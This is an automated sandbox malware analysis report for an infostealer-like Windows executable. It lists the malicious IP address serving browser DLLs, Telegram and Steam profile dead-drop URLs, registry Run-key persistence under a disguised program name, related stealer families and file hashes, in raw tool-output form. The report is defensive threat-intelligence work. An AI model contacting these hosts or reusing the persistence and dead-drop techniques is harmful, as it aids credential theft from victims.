C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe | 16% | ReversingLabs | Win32.Trojan.Generic |

No Antivirus matches

Source | Detection | Scanner | Label | Link
steamcommunity.com | 0% | Virustotal | | Browse
t.me | 0% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.192.247.89 | true | true | | unknown
t.me | 149.154.167.99 | true | true | | unknown
cowod.hopto.org | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://95.217.220.103/freebl3.dll | true | | unknown
https://95.217.220.103/nss3.dll | true | | unknown
https://95.217.220.103/vcruntime140.dll | true | | unknown
http://107.191.36.218/ | false | | unknown
https://95.217.220.103/mozglue.dll | true | | unknown
https://t.me/fun88rockskek | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://lv.queniujq.cn7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDHCBGD.2.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.youtube.com/7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://95.217.220.103/vcruntime140.dllnV7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                          unknown
                                                                                                          https://store.steampowered.com/privacy_agreement/7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://95.217.220.103AEB7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&am7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                              unknown
                                                                                                              https://95.217.220.103CAA7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://steamcommunity.com/profiles/76561199786602107/inventory/7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                  unknown
                                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtDHCBGD.2.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://95.217.220.103/%7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.google.com/recaptcha/7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://checkout.steampowered.com/7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                        unknown
                                                                                                                        https://95.217.220.10376561199786602107[1].htm.2.drfalse
                                                                                                                          unknown
                                                                                                                          https://t.me/fun88rockskekHn7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://store.steampo7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://store.steampowered.com/;7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://95.217.220.103/en-GB7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&amp;l=engl7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                  unknown
                                                                                                                                  https://store.steampowered.com/about/76561199786602107[1].htm.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://steamcommunity.com/my/wishlist/7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                    unknown
                                                                                                                                    https://t.me/7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                      unknown
                                                                                                                                      https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&amp;l=7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                        unknown
                                                                                                                                        http://cowod.hopto.FHIJJK7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://web.telegram.org7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://help.steampowered.com/en/7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://steamcommunity.com/market/7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                              unknown
                                                                                                                                              https://store.steampowered.com/news/7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&amp;l=english7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.07ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://recaptcha.net/recaptcha/;7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://steamcommunity.com/discussions/7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://store.steampowered.com/stats/7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://medal.tv7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://broadcast.st.dl.eccdnx.com7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
IP | Domain | Country | ASN | ASN Name | Malicious
107.191.36.218 | unknown | United States | 20473 | AS-CHOOPAUS | false
23.192.247.89 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
95.217.220.103 | unknown | Germany | 24940 | HETZNER-ASDE | true
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539807
Start date and time: 2024-10-23 07:01:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 7ZthFNAqYp.exe
renamed because original name is a hash value
Original Sample Name: 6733924c670207ed7755dc0fe2286c36.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/22@3/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 86
• Number of non-executed functions: 228
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 7ZthFNAqYp.exe, PID 3536 because there are no executed function
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:03:17 | API Interceptor | 1x Sleep call for process: 7ZthFNAqYp.exe modified
07:02:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditor C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe
07:02:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditor C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              23.192.247.89file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                    cVUjrXVdo9.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.28528.9811.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                                          SecuriteInfo.com.Trojan.Inject5.10240.9702.9504.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              TtiLyVLw3Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  95.217.220.103M8PoiLFYWM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • telegram.org/img/favicon.ico
                                                                                                                                                                                    http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                    http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                    http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • telegram.org/?setln=pl
                                                                                                                                                                                    http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                    http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • telegram.dog/
                                                                                                                                                                                    LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                    • t.me/cinoshibot
                                                                                                                                                                                    jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                    • t.me/cinoshibot
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    t.meUnlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                    aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                    Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.7855.32539.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                    https://njanimallaw.com/divorce-family-law/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 162.241.217.237
                                                                                                                                                                                    https://linkifly.net/TRACKINGGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 50.6.153.232
                                                                                                                                                                                    https://hwu.iaa.mybluehost.me/vvvop/SEEKKK/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 50.6.153.232
                                                                                                                                                                                    steamcommunity.comfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
File Type:ASCII text, with very long lines (1717), with CRLF line terminators
Category:modified
Size (bytes):10237
Entropy (8bit):5.498288591230544
Encrypted:false
SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:0F58C61DE9618A1B53735181E43EE166
SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:false
Reputation:moderate, very likely benign file
Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                        Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
